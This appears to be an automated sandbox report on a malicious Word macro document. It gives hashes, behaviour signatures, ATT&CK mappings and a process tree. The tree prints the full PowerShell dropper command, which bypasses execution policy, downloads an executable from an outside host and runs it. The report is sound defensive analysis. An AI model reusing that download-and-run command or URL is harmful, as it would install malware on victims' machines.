Analysis

  • max time kernel
    129s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 10:14

General

  • Target

    3411b47fcaa82aaafe11a622e67ef3ae_JaffaCakes118.doc

  • Size

    168KB

  • MD5

    3411b47fcaa82aaafe11a622e67ef3ae

  • SHA1

    94b855441b1c6ef2810425b8cb44953ac6c95798

  • SHA256

    dbd39f42c733918b961bbc90cb8858dc9818bbfeeecdb7c2cf1d58c2b7b00f3f

  • SHA512

    815f345c42e0c3216a3ca01b5e0b67b0c18052ff7502146dd31ef58c63f5b669f0343c924b421096a91e82e2a6e8abd224a0430c0214fcebcf7a381c2cd5899c

  • SSDEEP

    3072:SKk9XMOGRZhYPJU68AHshLUicf+0d+m2F4QC1E4G4zuhSOgdK:Gi3RfYxhNniNGIgSSOaK

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://thelokhalegian.com/hope.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3411b47fcaa82aaafe11a622e67ef3ae_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe powershell -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://thelokhalegian.com/hope.exe','%temp%\\nPQNW.exe');Start-Process '%temp%\\nPQNW.exe';
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4812

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD6DF3.tmp\iso690.xsl
    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hgahat1r.i0g.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2204-7-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-619-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-14-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-1-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-0-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-2-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-8-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-9-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-10-0x00007FF8F77F0000-0x00007FF8F7800000-memory.dmp
    Filesize

    64KB

  • memory/2204-13-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-12-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-15-0x00007FF8F77F0000-0x00007FF8F7800000-memory.dmp
    Filesize

    64KB

  • memory/2204-3-0x00007FF939A4D000-0x00007FF939A4E000-memory.dmp
    Filesize

    4KB

  • memory/2204-6-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-595-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-16-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-67-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-11-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-4-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-5-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-594-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-17-0x00007FF9399B0000-0x00007FF939BA5000-memory.dmp
    Filesize

    2.0MB

  • memory/2204-615-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-616-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-617-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/2204-618-0x00007FF8F9A30000-0x00007FF8F9A40000-memory.dmp
    Filesize

    64KB

  • memory/4812-103-0x0000023A49520000-0x0000023A49542000-memory.dmp
    Filesize

    136KB